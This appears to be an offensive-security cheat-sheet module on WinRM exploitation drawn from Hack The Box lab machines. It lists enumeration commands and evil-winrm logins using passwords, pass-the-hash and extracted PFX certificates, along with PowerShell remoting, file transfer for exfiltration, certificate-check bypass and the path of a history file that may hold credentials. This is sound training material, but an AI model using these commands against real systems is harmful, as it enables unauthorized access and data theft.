Back to All Modules

WinRM Exploitation

#Overview

Windows Remote Management (WinRM) on ports 5985 (HTTP) and 5986 (HTTPS) is Microsoft's implementation of the WS-Management protocol. It provides a PowerShell-based remote shell and is commonly enabled on servers for administration. WinRM accepts plaintext passwords, NTLM hashes (PTH), and certificates, making it one of the most versatile remote access vectors. Users in the "Remote Management Users" group can authenticate.

#Prerequisites

  • evil-winrm (Ruby gem)
  • Valid credentials (username/password) or NTLM hash
  • Alternatively: PowerShell Enter-PSSession, Invoke-Command from a Windows attacker machine
  • netexec for WinRM credential validation

#Detection & Enumeration

nmap -p 5985,5986 -sV <IP>                              # Service detection
netexec winrm <IP> -u <user> -p <pass>                   # Test credentials
netexec winrm <IP> -u <user> -H <hash>                   # Test with NTLM hash
BASH

#Exploitation / Execution

#evil-winrm with Password

evil-winrm -i <IP> -u <user> -p '<password>'            # Basic connection
evil-winrm -i <IP> -u <user> -p '<password>' -S          # Use SSL (port 5986)
BASH

#evil-winrm with NTLM Hash (Pass-the-Hash)

evil-winrm -i <IP> -u <user> -H <NTLM_hash>             # PTH over WinRM
evil-winrm -i sequel.htb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
BASH

#evil-winrm with Certificate

Certificates extracted from PFX files (e.g., from SMB shares) can authenticate to WinRM over SSL:

# Extract key and certificate from PFX
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

# Authenticate
evil-winrm -i <IP> -c cert.pem -k key.pem -S             # -S for SSL (port 5986)
BASH

#PowerShell Remoting (from Windows)

# Create a PSCredential object
$secpass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $secpass)

# Interactive session
Enter-PSSession -ComputerName <IP> -Credential $cred

# Execute single command
Invoke-Command -ComputerName <IP> -Credential $cred -ScriptBlock { whoami }
POWERSHELL

#File Upload / Download via evil-winrm

# Within evil-winrm session:
upload /path/to/local/file.exe        # Upload to target
download C:\path\to\remote\file.txt   # Download from target
BASH

#Bypassing SSL Certificate Validation

$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck
Enter-PSSession -ComputerName <IP> -Credential $cred -SessionOption $sessionOption -UseSSL
POWERSHELL

#Common Pitfalls

  • Warning: "Remote Management Users" group membership is required -- verify with net user <username>
  • Warning: Double-hop problem -- credentials are not forwarded by default in multi-hop scenarios; use CredSSP or explicit credentials within the session
  • Warning: Kerberos time skew -- ensure attacker clock is synced with DC: sudo ntpdate -u <DC_IP>

#OPSEC Considerations

  • Shield: WinRM connections generate Event ID 4624 (logon) and 4634 (logoff) with Logon Type 3
  • Shield: PowerShell activity is logged in Event ID 4104 (script block logging) and 4103 (module logging)
  • Shield: evil-winrm connections show PowerShell host process (wsmprovhost.exe) creation

#Post-Exploitation Value

  • Interactive PowerShell session with full command execution
  • File upload/download capability for tool transfer and data exfiltration
  • Session persistence (can reconnect without triggering new logon events each time)
  • PowerShell history file may contain credentials: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

#Cross-References

#Tool References

ToolLink
evil-winrmhttps://github.com/Hackplayers/evil-winrm
netexechttps://github.com/Porchetta-Industries/CrackMapExec

#Source Machines

  • Blackfield (Hard, AD) - WinRM access with hash from lsass dump
  • Cascade (Medium, AD) - WinRM login after TightVNC password decryption
  • Escape (Medium, AD) - WinRM login after MSSQL hash capture and cracking
  • Forest (Easy, AD) - WinRM login after ASREPRoasting svc-alfresco
  • Return (Easy, AD) - WinRM after LDAP credential capture via printer panel
  • Sauna (Easy, AD) - WinRM login after ASREPRoasting fsmith
  • Timelapse (Easy, AD) - WinRM login using PFX certificate